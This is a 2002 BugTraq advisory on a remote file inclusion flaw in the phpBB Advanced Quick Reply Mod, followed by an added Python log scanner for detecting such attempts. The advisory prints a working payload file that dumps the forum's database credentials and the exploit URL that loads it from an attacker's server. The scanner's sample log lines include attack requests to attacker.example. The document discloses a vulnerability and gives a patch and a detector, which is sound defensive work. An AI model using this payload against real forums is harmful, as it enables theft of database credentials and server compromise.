BugTraq
Code Injection in phpBB Advanced Quick Reply Mod
Nov 13 2002 07:49AM
Hai Nam Luke (hainamluke hotmail com)
Software: phpBB Advanced Quick Reply Mod
I've found a security hole in this software (Code Injection). You can
download this software at http://phpbbhacks.com/viewhack.php?id=586
Hackers can exploit this Mod to inject some shell code to hack your forum,
your website or your server (local exploit) because Code Injection is a
dangerous technique of hackers.
Exploit: (quick_reply.php)
    // $phpbb_root_path is never set in this branch, so a value supplied in the
    // request is used as the prefix of every include below.
    if ( $mode == 'smilies' )
    {
        define('IN_PHPBB', true);
        include($phpbb_root_path . 'extension.inc');
        include($phpbb_root_path . 'common.'.$phpEx);
        include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
        generate_smilies('window', PAGE_POSTING);
        exit;
    }
And you can make a PHP file named 'extension.inc' for inclusion to
access that forum. Example:
    <?php
    // runs inside the forum's own document root, so config.php resolves there
    include('config'.'.php');
    echo "DB Type: $dbms <br>";
    echo "DB Host: $dbhost <br>";
    echo "DB Name: $dbname <br>";
    echo "DB User: $dbuser <br>";
    echo "DB Pass: $dbpasswd <br>";
    exit;
    ?>
After that, you upload this file to your server
(http://[Your Server]/extension.inc) and enter the URL
http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles
You'll receive all the DB info of the forum.
Patch: (quick_reply.php)
[FIND]
if ( $mode == 'smilies' )
{
[ADD BEFORE]
    $phpbb_root_path = "./";
Sorry for my poor English.
Luke (HVA)
http://www.hackervn.net
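Added example, not part of Luke's post: a small detector a forum administrator can run over web server access logs to spot attempts to override phpbb_root_path with a remote URL or a traversal path, as described above. The log lines and host names are constructed; the combined-log regex and the parameter name are assumptions about a typical phpBB deployment.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not taken from any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [13/Nov/2002:07:49:01 +0000] "GET /forum/quick_reply.php?phpbb_root_path=http://attacker.example/&mode=smilies HTTP/1.0" 200 512
198.51.100.7 - - [13/Nov/2002:07:50:12 +0000] "GET /forum/quick_reply.php?mode=smilies HTTP/1.0" 200 2048
203.0.113.5 - - [13/Nov/2002:07:51:30 +0000] "GET /forum/quick_reply.php?phpbb_root_path=%68ttp%3A%2F%2Fattacker.example%2F&mode=smilies HTTP/1.0" 200 512
192.0.2.9 - - [13/Nov/2002:07:52:03 +0000] "GET /forum/viewtopic.php?t=42&phpbb_root_path=../../../tmp/ HTTP/1.0" 200 1337
192.0.2.9 - - [13/Nov/2002:07:53:00 +0000] "GET /forum/index.php HTTP/1.0" 200 4096
"""

# Apache/nginx combined log format: client, identity, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Any URL scheme prefix (http://, https://, ftp://, ...) means PHP would fetch the include remotely.
REMOTE_SCHEME = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.IGNORECASE)


def classify_root_path(value):
    """Return a reason string if a phpbb_root_path value is dangerous, else None."""
    v = unquote(value)  # parse_qs decoded once; decode again to catch double encoding
    if REMOTE_SCHEME.match(v):
        return "remote include (URL scheme)"
    if ".." in v.replace("\\", "/").split("/"):
        return "path traversal"
    if "\x00" in v:
        return "null byte"
    return None


def find_rfi_attempts(log_text):
    """Scan combined-format log text and return one dict per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable log line
        parts = urlsplit(m.group("target"))
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("phpbb_root_path", []):
            reason = classify_root_path(value)
            if reason:
                hits.append({"ip": m.group("ip"), "path": parts.path,
                             "value": value, "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['path']} phpbb_root_path={hit['value']!r}: {hit['reason']}")
```

A legitimate request never carries phpbb_root_path in the query string at all, so any occurrence is worth reviewing even when the value looks harmless.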
Copyright 2010, SecurityFocus